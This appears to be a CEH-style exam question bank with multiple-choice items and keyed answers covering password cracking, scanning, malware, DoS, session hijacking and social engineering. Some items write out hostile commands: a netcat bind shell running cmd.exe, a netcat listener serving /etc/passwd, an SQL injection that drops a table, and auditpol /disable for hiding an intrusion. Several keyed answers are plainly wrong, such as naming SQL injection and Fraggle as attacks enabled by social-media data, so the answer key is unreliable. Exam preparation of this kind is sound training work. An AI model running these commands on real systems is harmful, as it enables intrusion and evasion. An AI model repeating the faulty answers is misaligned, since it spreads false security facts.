Which of the following represent weak password? (Select 2 answers) a. Passwords that contain only special characters ExamplE. &* b. Passwords that contain only letters and special characters ExamplE. bob@&ba c. Passwords that contain Uppercase/Lowercase from a dictionary list ExamplE. OrAnGe d. Passwords that contain letters and numbers ExamplE. meerdfget123 e. Passwords that contain only numbers ExamplE. 23698217 f. Passwords that contain only special characters and numbers ExamplE. 123@$45 g. Passwords that contain only letters ExamplE. QWERTYKLRTY h. Passwords that contain letters,special characters,and numbers ExamplE. ap1$%

c. Passwords that contain Uppercase/Lowercase from a dictionary list ExamplE. OrAnGe g. Passwords that contain only letters ExamplE. QWERTYKLRTY

"Testing the network using the same methodologies and tools employed by attackers" Identify the correct terminology that defines the above statement. a. Security Policy Implementation b. Designing Network Security c. Penetration Testing d. Vulnerability Scanning

c. Penetration Testing

A company is using Windows Server 2003 for its Active Directory (AD). What is the most efficient way to crack the passwords for the AD users? a. Perform a brute force attack. b. Perform a dictionary attack. c. Perform an attack with a rainbow table. d. Perform a hybrid attack.

c. Perform an attack with a rainbow table.

A company firewall engineer has configured a new DMZ to allow public systems to be located away from the internal network. The engineer has three security zones set: Untrust (Internet) - (Remote network = 217.77.88.0/24) DMZ (DMZ) - (11.12.13.0/24) Trust (Intranet) - (192.168.0.0/24) The engineer wants to configure remote desktop access from a fixed IP on the remote network to a remote desktop server in the DMZ. Which rule would best fit this requirement? a. Permit 217.77.88.0/24 11.12.13.50 RDP 3389 b. Permit 217.77.88.12 11.12.13.0/24 RDP 3389 c. Permit 217.77.88.12 11.12.13.50 RDP 3389 d. Permit 217.77.88.0/24 11.12.13.0/24 RDP 3389

c. Permit 217.77.88.12 11.12.13.50 RDP 3389

A Buffer Overflow attack involves: a. Flooding the target network buffers with data traffic to reduce the bandwidth available to legitimate users b. Using a trojan program to direct data traffic to the target host's memory stack c. Poorly written software that allows an attacker to execute arbitrary code on a target system d. Using a dictionary to crack password buffers by guessing user names and passwords

c. Poorly written software that allows an attacker to execute arbitrary code on a target system

Jess the hacker runs L0phtCrack's built-in sniffer utility that grabs SMB password hashes and stores them for offline cracking. Once cracked, these passwords can provide easy access to whatever network resources the user account has access to. But Jess is not picking up hashes from the network. Why? a. L0phtCrack SMB sniffing only works through Switches and not Hubs b. The network protocol is configured to use IPSEC c. The network protocol is configured to use SMB Signing d. The physical network wire is on fibre optic cable

c. The network protocol is configured to use SMB Signing

Rebecca is a security analyst and knows of a local root exploit that has the ability to enable local users to use available exploits to gain root privileges. This vulnerability exploits a condition in the Linux kernel within the execve() system call. There is no known workaround that exists for this vulnerability. What is the correct action to be taken by Rebecca in this situation as a recommendation to management? a. Rebecca should make a recommendation to set all child-process to sleep within the execve() b. Rebecca should make a recommendation to hire more system administrators to monitor all child processes to ensure that each child process can't elevate privilege c. Rebecca should make a recommendation to upgrade the Linux kernel promptly d. Rebecca should make a recommendation to disable the() system call

c. Rebecca should make a recommendation to upgrade the Linux kernel promptly

What is the goal of a Denial of Service Attack? a. Exploit a weakness in the TCP stack. b. Capture files from a remote computer. c. Render a network or computer incapable of providing normal service. d. Execute service at PS 1009.

c. Render a network or computer incapable of providing normal service.

Joe the Hacker breaks into XYZ's Linux system and plants a wiretap program in order to sniff passwords and user accounts off the wire. The wiretap program is embedded as a Trojan horse in one of the network utilities. Joe is worried that network administrator might detect the wiretap program by querying the interfaces to see if they are running in promiscuous mode. Picture: (Test 9 #13) What can Joe do to hide the wiretap program from being detected by ifconfig command? a. You cannot disable Promiscuous mode detection on Linux systems. b. Run the wiretap program in stealth mode from being detected by the ifconfig command. c. Replace original ifconfig utility with the rootkit version of ifconfig hiding Promiscuous information being displayed on the console. d. Block output to the console whenever the user runs ifconfig command by running screen capture utiliyu

c. Replace original ifconfig utility with the rootkit version of ifconfig hiding Promiscuous information being displayed on the console.

What hacking attack is challenge/response authentication used to prevent? a. Password cracking attacks b. Session hijacking attacks c. Replay attacks d. Scanning attacks

c. Replay attacks

A network security administrator is worried about potential man-in-the-middle attacks when users access a corporate web site from their workstations. Which of the following is the best remediation against this type of attack? a. Requiring strong authentication for all DNS queries b. Implementing server-side PKI certificates for all connections c. Requiring client and server PKI certificates for all connections d. Mandating only client-side PKI certificates for all connections

c. Requiring client and server PKI certificates for all connections

Which of the following can take an arbitrary length of input and produce a message digest output of 160 bit? a. MD5 b. HAVAL c. SHA-1 d. MD4

c. SHA-1

Which DNS resource record can indicate how long any "DNS poisoning" could last? a. MX b. NS c. SOA d. TIMEOUT

c. SOA

Which port, when configured on a switch receives a copy of every packet that passes through it? Picture: (Test 2 #50) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-153.gif a. R-DUPE Port b. PORTMON c. SPAN port d. MIRROR port

c. SPAN port

Information gathered from social networking websites such as Facebook, Twitter and LinkedIn can be used to launch which of the following types of attacks? (Choose two.) a. Social engineering attack b. Distributed denial of service attack c. SQL injection attack d. Smurf attack e. Fraggle attack f. Phishing attack

c. SQL injection attack e. Fraggle attack

What are the differences between SSL and S-HTTP? a. SSL operates at the application layer and S-HTTP operates at the network layer b. SSL operates at the network layer and S-HTTP operates at the application layer c. SSL operates at the transport layer and S-HTTP operates at the application layer d. SSL operates at the application layer and S-HTTP operates at the transport layer

c. SSL operates at the transport layer and S-HTTP operates at the application layer

What type of session hijacking attack is shown in the exhibit? Picture: (Test 2 #54) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-155.gif a. Cross-site scripting Attack b. SQL Injection Attack c. Session Sniffing Attack d. Token sniffing Attack

c. Session Sniffing Attack

Ursula is a college student at a University in Amsterdam. Ursula originally went to college to study engineering but later changed to marine biology after spending a month at sea with her friends. These friends frequently go out to sea to follow and harass fishing fleets that illegally fish in foreign waters. Ursula eventually wants to put companies practicing illegal fishing out of business. Ursula decides to hack into the parent company's computers and destroy critical data knowing fully well that, if caught, she probably would be sent to jail for a very long time. What would Ursula be considered? a. She would be called a cracker. b. Ursula would be considered a gray hat since she is performing an act against illegal activities. c. She would be considered a suicide hacker. d. Ursula would be considered a black hat.

c. She would be considered a suicide hacker.

On a backdoored Linux box there is a possibility that legitimate programs are modified or trojaned. How is it possible to list processes and uids associated with them in a more reliable manner? a. Use "Is" b. Use "netstat" c. Use "lsof" d. Use "echo"

c. Use "lsof"

Stephanie works as a records clerk in a large office building in downtown Chicago. On Monday, she went to a mandatory security awareness class (Security5) put on by her company's IT department. During the class, the IT department informed all employees that everyone's Internet activity was thenceforth going to be monitored. Stephanie is worried that her Internet activity might give her supervisor reason to write her up, or worse get her fired. Stephanie's daily work duties only consume about four hours of her time, so she usually spends the rest of the day surfing the web. Stephanie really enjoys surfing the Internet but definitely does not want to get fired for it. What should Stephanie use so that she does not get in trouble for surfing the Internet? a. Stealth Firefox b. Stealth IE c. Stealth Anonymizer d. Cookie Disabler

c. Stealth Anonymizer

Which of the following viruses tries to hide from anti-virus programs by actively altering and corrupting the chosen service call interruptions when they are being run? a. Polymorphic virus b. Cavity virus c. Stealth virus d. Tunneling virus

c. Stealth virus

Which of the following is not an effective countermeasure against replay attacks? a. Digital signatures b. Sequence numbers c. System identification d. Time Stamps

c. System identification

What happens during a SYN flood attack? a. A TCP packet is received with the FIN bit set but with no ACK bit set in the flags field. b. A TCP SYN packet,which is a connection initiation,is sent to a target machine,giving the target host's address as both source and destination,and is using the same port on the target host as both source and destination. c. TCP connection requests floods a target machine is flooded with randomized source address & ports for the TCP ports. d. A TCP packet is received with both the SYN and the FIN bits set in the flags field.

c. TCP connection requests floods a target machine is flooded with randomized source address & ports for the TCP ports.

A consultant is hired to do physical penetration testing at a large financial company. In the first day of his assessment, the consultant goes to the company`s building dressed like an electrician and waits in the lobby for an employee to pass through the main access gate, then the consultant follows the employee behind to get into the restricted area. Which type of attack did the consultant perform? a. Man trap b. Shoulder surfing c. Tailgating d. Social engineering

c. Tailgating

What did the following commands determine? C: user2sid \earth guest S-1-5-21-343818398-789336058-1343024091-501 C:sid2user 5 21 343818398 789336058 1343024091 500 Name is Joe Domain is EARTH a. Issued alone,these commands prove nothing b. These commands demonstrate that the guest account has NOT been disabled c. That the true administrator is Joe d. That the Joe account has a SID of 500 e. These commands demonstrate that the guest account has been disabled

c. That the true administrator is Joe

Exhibit: Picture: (Test 7 #33) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-622.gif The following is an entry captured by a network IDS.You are assigned the task of analyzing this entry. You notice the value 0x90, which is the most common NOOP instruction for the Intel processor. You figure that the attacker is attempting a buffer overflow attack. You also notice "/bin/sh" in the ASCII part of the output. As an analyst what would you conclude about the attack? a. The attacker is creating a directory on the compromised machine b. The attacker is attempting a buffer overflow attack and has succeeded c. The attacker is attempting an exploit that launches a command-line shell d. The buffer overflow attack has been neutralized by the IDS

c. The attacker is attempting an exploit that launches a command-line shell

Neil notices that a single address is generating traffic from its port 500 to port 500 of several other machines on the network. This scan is eating up most of the network bandwidth and Neil is concerned. As a security professional, what would you infer from this scan? a. The attacker is trying to detect machines on the network which have SSL enabled b. It is a network fault and the originating machine is in a network loop c. The attacker is trying to determine the type of VPN implementation and checking for IPSec d. It is a worm that is malfunctioning or hardcoded to scan on port 500

c. The attacker is trying to determine the type of VPN implementation and checking for IPSec

John is the network administrator of XSECURITY systems. His network was recently compromised. He analyzes the log files to investigate the attack. Take a look at the following Linux log file snippet. The hacker compromised and "owned" a Linux machine. What is the hacker trying to accomplish here? Picture: (Test 3 #27) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-237.gif a. The hacker is attempting to compromise more machines on the network b. The hacker is planting a rootkit c. The hacker is trying to cover his tracks d. The hacker is running a buffer overflow exploit to lock down the system

c. The hacker is trying to cover his tracks

When setting up a wireless network, an administrator enters a pre-shared key for security. Which of the following is true? a. The key is an RSA key used to encrypt the wireless data. b. The key entered is a hash that is used to prove the integrity of the wireless data. c. The key entered is a symmetric key used to encrypt the wireless data. d. The key entered is based on the Diffie-Hellman method.

c. The key entered is a symmetric key used to encrypt the wireless data.

In what stage of Virus life does a stealth virus gets activated with the user performing certain actions such as running an infected program? a. Elimination b. Incorporation c. Detection d. Launch e. Design f. Replication

d. Launch

Tess King is making use of Digest Authentication for her Web site. Why is this considered to be more secure than Basic authentication? a. The password sent in clear text over the network is never reused. b. Basic authentication is broken c. The password is never sent in clear text over the network d. It is based on Kerberos authentication protocol

c. The password is never sent in clear text over the network

What two things will happen if a router receives an ICMP packet, which has a TTL value of 1, and the destination host is several hops away? (Select 2 answers) a. The router will send an ICMP Redirect Message to the source host b. The router will decrement the TTL value and forward the packet to the next router on the path to the destination host c. The router will discard the packet d. The router will send a time exceeded message to the source host e. The router will increment the TTL value and forward the packet to the next router on the path to the destination host.

c. The router will discard the packet d. The router will send a time exceeded message to the source host

Firewalk has just completed the second phase (the scanning phase) and a technician receives the output shown below. What conclusions can be drawn based on these scan results? TCP port 21 -no response TCP port 22 - no response TCP port 23 - Time-to-live exceeded a. The firewall itself is blocking ports 21 through 23 and a service is listening on port 23 of the target host. b. The lack of response from ports 21 and 22 indicate that those services are not running on the destination server. c. The scan on port 23 passed through the filtering device. This indicates that port 23 was not blocked at the firewall. d. The scan on port 23 was able to make a connection to the destination host prompting the firewall to respond with a TTL error.

c. The scan on port 23 passed through the filtering device. This indicates that port 23 was not blocked at the firewall.

While scanning a network you observe that all of the web servers in the DMZ are responding to ACK packets on port 80. What can you infer from this observation? a. They are using UNIX based web servers. b. They are using Windows based web servers. c. They are not using a stateful inspection firewall. d. They are not using an intrusion detection system.

c. They are not using a stateful inspection firewall.

More sophisticated IDSs look for common shellcode signatures. But even these systems can be bypassed, by using polymorphic shellcode. This is a technique common among virus writers? It basically hides the true nature of the shellcode in different disguises. How does a polymorphic shellcode work? a. They convert the shellcode into Unicode,using loader to convert back to machine code then executing them b. They reverse the working instructions into opposite order by masking the IDS signatures c. They encrypt the shellcode by XORing values over the shellcode,using loader code to decrypt the shellcode,and then executing the decrypted shellcode d. They compress shellcode into normal instructions,uncompress the shellcode using loader code and then executing the shellcode

c. They encrypt the shellcode by XORing values over the shellcode,using loader code to decrypt the shellcode,and then executing the decrypted shellcode

What will the following command produce on a website's login page if executed successfully? SELECT email, passwd, login_id, full_name FROM members WHERE email = '[email protected]'; DROP TABLE members; --' a. This command will not produce anything since the syntax is incorrect. b. It retrieves the password for the first user in the members table. c. This command will delete the entire members table. d. This code will insert the [email protected] email address into the members table.

c. This command will delete the entire members table.

Snort has been used to capture packets on the network. On studying the packets, the penetration tester finds it to be abnormal. If you were the penetration tester, why would you find this abnormal? What is odd about this attack? (Choose the most appropriate statement) a. The attacker wants to avoid creating a sub-carrier connection that is not normally valid. b. This is not a spoofed packet as the IP stack has increasing numbers for the three flags. c. This is back orifice activity as the scan comes from port 31337. d. There packets were created by a tool; they were not created by a standard IP stack.

c. This is back orifice activity as the scan comes from port 31337.

Why would you consider sending an email to an address that you know does not exist within the company you are performing a Penetration Test for? a. To perform a DoS b. To determine who is the holder of the root account c. To illicit a response back that will reveal information about email servers and how they treat undeliverable mail d. To test for virus protection e. To create needless SPAM

c. To illicit a response back that will reveal information about email servers and how they treat undeliverable mail

If an e-commerce site was put into a live environment and the programmers failed to remove the secret entry point that was used during the application development, what is this secret entry point known as? _____ a. SQL injection b. Honey pot c. Trap door d. SDLC process

c. Trap door

Which protocol and port number might be needed in order to send log messages to a log analysis tool that resides behind a firewall? a. UDP 123 b. UDP 415 c. UDP 514 d. UDP 541

c. UDP 514

Which of the following represents the initial two commands that an IRC client sends to join an IRC network? a. LOGIN,NICK b. USER,PASS c. USER,NICK d. LOGIN,USER

c. USER,NICK

An NMAP scan of a server shows port 69 is open. What risk could this pose? a. Weak SSL version b. Cleartext login c. Unauthenticated access d. Web portal data leak

c. Unauthenticated access

A program that defends against a port scanner will attempt to: a. Sends back bogus data to the port scanner b. Limit access by the scanning system to publicly available ports only c. Update a firewall rule in real time to prevent the port scan from being completed d. Log a violation and recommend use of security-auditing tools

c. Update a firewall rule in real time to prevent the port scan from being completed

Your company has blocked all the ports via external firewall and only allows port 80/443 to connect to the Internet. You want to use FTP to connect to some remote server on the Internet. How would you accomplish this? a. Use TOR Network b. Use Reverse Chaining c. Use HTTP Tunneling d. Use Proxy Chaining

c. Use HTTP Tunneling

To scan a host downstream from a security gateway, Firewalking: a. Assesses the security rules that relate to the target system before it sends packets to any hops on the route to the gateway b. Sends a UDP-based packet that it knows will be blocked by the firewall to determine how specifically the firewall responds to such packets c. Uses the TTL function to send packets with a TTL value set to expire one hop past the identified security gateway d. Sends an ICMP ''administratively prohibited'' packet to determine if the gateway will drop the packet without comment.

c. Uses the TTL function to send packets with a TTL value set to expire one hop past the identified security gateway

Which of the following is an application that requires a host application for replication? a. Worm b. Trojan c. Virus d. Micro

c. Virus

You are footprinting an organization and gathering competitive intelligence. You visit the company's website for contact information and telephone numbers but do not find them listed there. You know they had the entire staff directory listed on their website 12 months ago but now it is not there. Is there any way you can retrieve information from a website that is outdated? a. Crawl the entire website and store them into your computer b. Visit the company's partners and customers website for this information c. Visit Archive.org web site to retrieve the Internet archive of the company's website d. Visit Google's search engine and view the cached copy

c. Visit Archive.org web site to retrieve the Internet archive of the company's website

What is the key advantage of Session Hijacking? a. You can successfully predict the sequence number generation. b. It can be easily done and does not require sophisticated skills. c. You can take advantage of an authenticated connection. d. You cannot be traced in case the hijack is detected.

c. You can take advantage of an authenticated connection.

What does black box testing mean? a. You have partial knowledge of the environment b. You have full knowledge of the environment c. You have no knowledge of the environment

c. You have no knowledge of the environment

One way to defeat a multi-level security solution is to leak data via a. asymmetric routing. b. steganography. c. a covert channel. d. a bypass regulator.

c. a covert channel.

You have successfully gained access to a victim's computer using Windows 2003 Server SMB Vulnerability. Which command will you run to disable auditing from the cmd? a. EnterPol /nolog b. stoplog stoplog ? c. auditpol.exe /disable d. EventViewer o service

c. auditpol.exe /disable

Which type of hacker represents the highest risk to your network? a. black hat hackers b. grey hat hackers c. disgruntled employees d. script kiddies

c. disgruntled employees

What does the following command in netcat do? nc -l -u -p55555 < /etc/passwd a. deletes the /etc/passwd file when connected to the UDP port 55555 b. logs the incoming connections to /etc/passwd file c. grabs the /etc/passwd file when connected to UDP port 55555 d. loads the /etc/passwd file to the UDP port 55555

c. grabs the /etc/passwd file when connected to UDP port 55555

A developer for a company is tasked with creating a program that will allow customers to update their billing and shipping information. The billing address field used is limited to 50 characters. What pseudo code would the developer use to avoid a buffer overflow attack on the billing address field? a. if (billingAddress = 50) {update field} else exit b. if (billingAddress != 50) {update field} else exit c. if (billingAddress <= 50) {update field} else exit d. if (billingAddress >= 50) {update field} else exit

c. if (billingAddress <= 50) {update field} else exit

What is the correct command to run Netcat on a server using port 56 that spawns command shell when connected? Picture: (Test 1 #43) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-045.gif a. nc -r 56 -c cmd.exe b. nc -port 56 -s cmd.exe c. nc -L 56 -t -e cmd.exe d. nc -p 56 -p -e shell.exe

c. nc -L 56 -t -e cmd.exe

In Linux, the three most common commands that hackers usually attempt to Trojan are: a. vmware,sed,less b. xterm,ps,nc c. netstat,ps,top d. car,xterm,grep

c. netstat,ps,top

Jackson discovers that the wireless AP transmits 128 bytes of plaintext, and the station responds by encrypting the plaintext. It then transmits the resulting ciphertext using the same key and cipher that are used by WEP to encrypt subsequent network traffic. What authentication mechanism is being followed here? a. single key authentication b. no authentication c. shared key authentication d. open system authentication

c. shared key authentication

Which of the following is used to indicate a single-line comment in structured query language (SQL)? a. %% b. || c. '' d. --

d. --

A newly discovered flaw in a software application would be considered which kind of security vulnerability? a. Input validation flaw b. Time-to-check to time-to-use flaw c. HTTP header injection vulnerability d. 0-day vulnerability

d. 0-day vulnerability

How many bits encryption does SHA-1 use? a. 256 bits b. 64 bits c. 128 bits d. 160 bits

d. 160 bits

You generate MD5 128-bit hash on all files and folders on your computer to keep a baseline check for security reasons. Picture: (Test 3 #4) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-206.gif What is the length of the MD5 hash? a. 64 byte b. 128 kb c. 48 char d. 32 character

d. 32 character

You have chosen a 22 character word from the dictionary as your password. How long will it take to crack the password by an attacker? a. 200 years b. 16 million years c. 23 days d. 5 minutes

d. 5 minutes

When working with Windows systems, what is the RID of the true administrator account? a. 1001 b. 512 c. 1000 d. 500 e. 1024 f. 501

d. 500

An nmap command that includes the host specification of 202.176.56-57.* will scan _______ number of hosts. a. 2 b. 256 c. Over 10,000 d. 512

d. 512

Syslog is a standard for logging program messages. It allows separation of the software that generates messages from the system that stores them and the software that reports and analyzes them. It also provides devices, which would otherwise be unable to communicate a means to notify administrators of problems or performance. Picture: (Test 1 #55) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-042.gif What default port Syslog daemon listens on? a. 416 b. 242 c. 312 d. 514

d. 514

You have been called to investigate a sudden increase in network traffic at XYZ. It seems that the traffic generated was too heavy that normal business functions could no longer be rendered to external employees and clients. After a quick investigation, you find that the computer has services running attached to TFN2k and Trinoo software. What do you think was the most likely cause behind this sudden increase in traffic? a. A network card that was jabbering. b. A bad route on the firewall. c. Invalid rules entry at the gateway. d. A distributed denial of service attack.

d. A distributed denial of service attack.

Who is an Ethical Hacker? a. A person who hacks for offensive purposes b. A person who hacks for an ethical cause c. A person who hacks for ethical reasons d. A person who hacks for defensive purposes

d. A person who hacks for defensive purposes

Which of the following is a component of a risk assessment? a. Physical security b. Logical interface c. DMZ d. Administrative safeguards

d. Administrative safeguards

What do Trinoo, TFN2k, WinTrinoo, T-Sight, and Stracheldraht have in common? a. All are tools that can be used not only by hackers,but also security personnel b. All are tools that are only effective against Windows c. All are tools that are only effective against Linux d. All are DDOS tools e. All are hacking tools developed by the legion of doom

d. All are DDOS tools

Study the snort rule given below and interpret the rule. alert tcp any any --> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msG. "mountd access";) a. An alert is generated when a TCP packet is generated from any IP on the 192.168.1.0 subnet and destined to any IP on port 111 b. An alert is generated when any packet other than a TCP packet is seen on the network and destined for the 192.168.1.0 subnet c. An alert is generated when a TCP packet is originated from port 111 of any IP address to the 192.168.1.0 subnet d. An alert is generated when a TCP packet originating from any IP address is seen on the network and destined for any IP address on the 192.168.1.0 subnet on port 111

d. An alert is generated when a TCP packet originating from any IP address is seen on the network and destined for any IP address on the 192.168.1.0 subnet on port 111

Which of the following items is unique to the N-tier architecture method of designing software applications? a. It is compatible with various databases including Access,Oracle,and SQL. b. Application layers can be written in C,ASP.NET,or Delphi without any performance loss. c. Data security is tied into each layer and must be updated for all layers when any upgrade is performed. d. Application layers can be separated,allowing each layer to be upgraded independently from other layers.

d. Application layers can be separated,allowing each layer to be upgraded independently from other layers.

An ethical hacker for a large security research firm performs penetration tests, vulnerability tests, and risk assessments. A friend recently started a company and asks the hacker to perform a penetration test and vulnerability assessment of the new company as a favor. What should the hacker's next step be before starting work on this job? a. Begin the reconnaissance phase with passive information gathering and then move into active information gathering. b. Start by foot printing the network and mapping out a plan of attack. c. Use social engineering techniques on the friend's employees to help identify areas that may be susceptible to attack. d. Ask the employer for authorization to perform the work outside the company.

d. Ask the employer for authorization to perform the work outside the company.

The network administrator for a company is setting up a website with e-commerce capabilities. Packet sniffing is a concern because credit card information will be sent electronically over the Internet. Customers visiting the site will need to encrypt the data with HTTPS. Which type of certificate is used to encrypt and decrypt the data? a. Symmetric b. Confidential c. Non-confidential d. Asymmetric

d. Asymmetric

Which of the following is a detective control? a. Security policy b. Smart card authentication c. Continuity of operations plan d. Audit trail

d. Audit trail

Ron has configured his network to provide strong perimeter security. As part of his network architecture, he has included a host that is fully exposed to attack. The system is on the public side of the demilitarized zone, unprotected by a firewall or filtering router. What would you call such a host? a. DMZ host b. DWZ host c. Honeypot d. Bastion Host

d. Bastion Host

_____________ is a type of symmetric-key encryption algorithm that transforms a fixed-length block of plaintext (unencrypted text) data into a block of ciphertext (encrypted text) data of the same length. a. Bit Cipher b. Stream Cipher c. Hash Cipher d. Block Cipher

d. Block Cipher

Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threats, but it does not secure the application from coding errors. It can provide data privacy; integrity and enable strong authentication but it cannot mitigate programming errors. What is a good example of a programming error that Bob can use to explain to the management how encryption will not address all their security concerns? a. Bob can explain that using passwords to derive cryptographic keys is a form of a programming error b. Bob can explain that a random number generator can be used to derive cryptographic keys but it uses a weak seed value and this is a form of a programming error c. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique d. Bob can explain that using a weak key management technique is a form of programming error

d. Bob can explain that using a weak key management technique is a form of programming error

Which of the following items of a computer system will an anti-virus program scan for viruses? a. Password Protected Files b. Windows Process List c. Deleted Files d. Boot Sector

d. Boot Sector

Frederickson Security Consultants is currently conducting a security audit on the networks of Hawthorn Enterprises, a contractor for the Department of Defense. Since Hawthorn Enterprises conducts business daily with the federal government, they must abide by very stringent security policies. Frederickson is testing all of Hawthorn's physical and logical security measures including biometrics, passwords, and permissions. The federal government requires that all users must utilize random, non-dictionary passwords that must take at least 30 days to crack. Frederickson has confirmed that all Hawthorn employees use a random password generator for their network passwords. The Frederickson consultants have saved off numerous SAM files from Hawthorn's servers using Pwdump6 and are going to try and crack the network passwords. What method of attack is best suited to crack these passwords in the shortest amount of time? a. Birthday attack b. Dictionary attack c. Brute service attack d. Brute force attack

d. Brute force attack

The programmers on your team are analyzing the free, open source software being used to run FTP services on a server. They notice that there is an excessive number of fgets() and gets() on the source code. These C++ functions do not check bounds. What kind of attack is this program susceptible to? a. Denial of Service b. Shatter Attack c. Password Attack d. Buffer of Overflow

d. Buffer of Overflow

Bart is looking for a Windows NT/2000/XP command-line tool that can be used to assign, display, or modify ACL's (access control lists) to files or folders and also one that can be used within batch files. Which of the following tools can be used for that purpose? (Choose the best answer) a. PERM.exe b. NTPERM.exe c. CLACS.exe d. CACLS.exe

d. CACLS.exe

A corporation hired an ethical hacker to test if it is possible to obtain users' login credentials using methods other than social engineering. Access to offices and to a network node is granted. Results from server scanning indicate all are adequately patched and physical access is denied, thus, administrators have access only through Remote Desktop. Which technique could be used to obtain login credentials? a. Capture every users' traffic with Ettercap. b. Guess passwords using Medusa or Hydra against a network service. c. Capture LANMAN Hashes and crack them with LC6. d. Capture administrators RDP traffic and decode it with Cain and Abel.

d. Capture administrators RDP traffic and decode it with Cain and Abel.

An attacker has successfully compromised a remote computer. Which of the following comes as one of the last steps that should be taken to ensure that the compromise cannot be traced back to the source of the problem? a. Setup a backdoor b. Install patches c. Install a zombie for DDOS d. Cover your tracks

d. Cover your tracks

An employee wants to defeat detection by a network-based IDS application. He does not want to attack the system containing the IDS application. Which of the following strategies can be used to defeat detection by a network-based IDS application? (Choose the best answer) a. Create a SYN flood. b. Create a ping flood. c. Create a multiple false positives. d. Create a network tunnel.

d. Create a network tunnel.

While testing web applications, you attempt to insert the following test script into the search area on the company's web site: <script>alert('Testing Testing Testing')</script> Later, when you press the search button, a pop up box appears on your screen with the text "Testing Testing Testing". What vulnerability is detected in the web application here? a. A Buffer Overflow b. Password attacks c. A hybrid attack d. Cross Site Scripting

d. Cross Site Scripting

What is the algorithm used by LM for Windows2000 SAM? a. SSL b. MD4 c. SHA d. DES

d. DES

In which part of OSI layer, ARP Poisoning occurs? Picture: (Test 1 #52) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-048.gif a. Application layer b. Transport Layer c. Physical Layer d. Datalink Layer

d. Datalink Layer

What is a successful method for protecting a router from potential smurf attacks? a. Installing the router outside of the network's firewall b. Placing the router in broadcast mode c. Enabling port forwarding on the router d. Disabling the router from accepting broadcast ping messages

d. Disabling the router from accepting broadcast ping messages

A majority of attacks come from insiders, people who have direct access to a company's computer system as part of their job function or a business relationship. Who is considered an insider? a. A competitor to the company because they can directly benefit from the publicity generated by making such an attack b. The CEO of the company because he has access to all of the computer systems c. A government agency since they know the company's computer system strengths and weaknesses d. Disgruntled employee, customers, suppliers, vendors, business partners, contractors, temps, and consultants

d. Disgruntled employee, customers, suppliers, vendors, business partners, contractors, temps, and consultants

While performing ping scans into a target network you get a frantic call from the organization's security team. They report that they are under a denial of service attack. When you stop your scan, the smurf attack event stops showing up on the organization's IDS monitor. How can you modify your scan to prevent triggering this event in the IDS? a. Spoof the source IP address. b. Only scan the Windows systems. c. Scan more slowly. d. Do not scan the broadcast IP.

d. Do not scan the broadcast IP.

BankerFox is a Trojan that is designed to steal users' banking data related to certain banking entities. When they access any website of the affected banks through the vulnerable Firefox 3.5 browser, the Trojan is activated and logs the information entered by the user. All the information entered in that website will be logged by the Trojan and transmitted to the attacker's machine using covert channel. BankerFox does not spread automatically using its own means. It needs an attacking user's intervention in order to reach the affected computer. Picture: (Test 1 #82) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-090.gif What is the most efficient way an attacker located in remote location to infect this banking Trojan on a victim's machine? a. Physical access - the attacker can simply copy a Trojan horse to a victim's hard disk infecting the machine via Firefox add-on extensions b. Custom packaging - the attacker can create a custom Trojan horse that mimics the appearance of a program that is unique to that particular computer c. Custom packaging - the attacker can create a custom Trojan horse that mimics the appearance d. Downloading software from a website. An attacker can offer free software,such as shareware programs and pirated mp3 files e. Custom packaging - the attacker can create custom Trojan horse that mimics the appearance of a program that is unique to that particular computer

d. Downloading software from a website. An attacker can offer free software,such as shareware programs and pirated mp3 files

Joel and her team have been going through tons of garbage, recycled paper, and other rubbish in order to find some information about the target they are attempting to penetrate. How would you call this type of activity? a. CI Gathering b. Scanning c. Garbage Scooping d. Dumpster Diving

d. Dumpster Diving

Oregon Corp is fighting a litigation suit with Scamster Inc. Oregon has assigned a private investigative agency to go through garbage, recycled paper, and other rubbish at Scamster's office site in order to find relevant information. What would you call this kind of activity? a. Scanning b. CI Gathering c. Garbage Scooping d. Dumpster Diving

d. Dumpster Diving

Bob waits near a secured door, holding a box. He waits until an employee walks up to the secured door and uses the special card in order to access the restricted area of the target company. Just as the employee opens the door, Bob walks up to the employee (still holding the box) and asks the employee to hold the door open so that he can enter. What is the best way to undermine the social engineering activity of tailgating? a. Issue special cards to access secure doors at the company and provide a one-time only brief description of use of the special card b. Setup a mock video camera next to the special card reader adjacent to the secure door c. Post a sign that states,"no tailgating" next to the special card reader adjacent to the secure door d. Educate and enforce physical security policies of the company to all the employees on a regular basis

d. Educate and enforce physical security policies of the company to all the employees on a regular basis

Which of the following is an example of two factor authentication? a. PIN Number and Birth Date b. Username and Password c. Digital Certificate and Hardware Token d. Fingerprint and Smartcard ID

d. Fingerprint and Smartcard ID

You are attempting to map out the firewall policy for an organization. You discover your target system is one hop beyond the firewall. Using hping2, you send SYN packets with the exact TTL of the target system starting at port 1 and going up to port 1024. What is this process known as? a. Enumeration b. Footprinting c. Idle scanning d. Firewalking

d. Firewalking

The traditional traceroute sends out ICMP ECHO packets with a TTL of one, and increments the TTL until the destination has been reached. By printing the gateways that generate ICMP time exceeded messages along the way, it is able to determine the path packets take to reach the destination. The problem is that with the widespread use of firewalls on the Internet today, many of the packets that traceroute sends out end up being filtered, making it impossible to completely trace the path to the destination. Picture: (Test 3 #46) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-250.gif How would you overcome the Firewall restriction on ICMP ECHO packets? a. \> JOHNTHETRACER www.eccouncil.org -F -evade b. Firewalls will permit inbound UDP packets to specific ports that hosts sitting behind the firewall are listening for connections. By sending out TCP SYN packets instead of ICMP ECHO packets, traceroute can bypass the most common firewall filters. c. Do not use traceroute command to determine the path packets take to reach the destination instead use the custom hacking tool JOHNTHETRACER and run with the command d. Firewalls will permit inbound TCP packets to specific ports that hosts sitting behind the firewall are listening for connections. By sending out TCP SYN packets instead of ICMP ECHO packets, traceroute can bypass the most common firewall filters.

